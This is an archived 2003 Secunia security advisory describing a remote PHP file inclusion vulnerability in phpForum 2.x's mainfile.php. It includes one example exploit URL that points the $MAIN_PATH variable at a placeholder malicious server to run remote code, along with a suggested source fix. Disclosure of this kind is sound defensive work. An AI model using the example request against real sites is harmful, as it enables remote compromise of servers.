From: Secunia Security Advisories (sec-advsecunia.com)
Date: Mon Jul 14 2003 - 08:02:33 CDT

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

TITLE:
phpForum Arbitrary PHP Script Inclusion Vulnerability

READ ONLINE:
http://www.secunia.com/advisories/9258/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
From remote

SOFTWARE:
phpForum 2.x

DESCRIPTION:
A vulnerability has been reported in phpForum, which can be exploited
by malicious people to compromise a vulnerable system.

The vulnerability is caused due to an input validation error in
"mainfile.php" making it possible to supply arbitrary paths to files
in the variable "$MAIN_PATH". This can be exploited by supplying a
path to a malicious file on a remote server, which can result in
execution of arbitrary code on the vulnerable system.

An example, which will include the file "config.php" from a remote
server, was included in the original advisory:
http://[victim]/forum/mainfile.php?MAIN_PATH=http://[malicious_server]

The vulnerability has been reported in version 2 RC-1. However, prior
versions may also be affected.

SOLUTION:
Edit the source code so that a remote user cannot supply the path to
an external server.

REPORTED BY / CREDITS:
Marc Bromm

----------------------------------------------------------------------

Secunia recommends that you verify all advisories you receive, by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.

Contact details:
Web : http://www.secunia.com/
E-mail : supportsecunia.com
Tel : +44 (0) 20 7016 2693
Fax : +44 (0) 20 7637 0419

----------------------------------------------------------------------

Unsubscribe: Secunia Security Advisories

----------------------------------------------------------------------

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]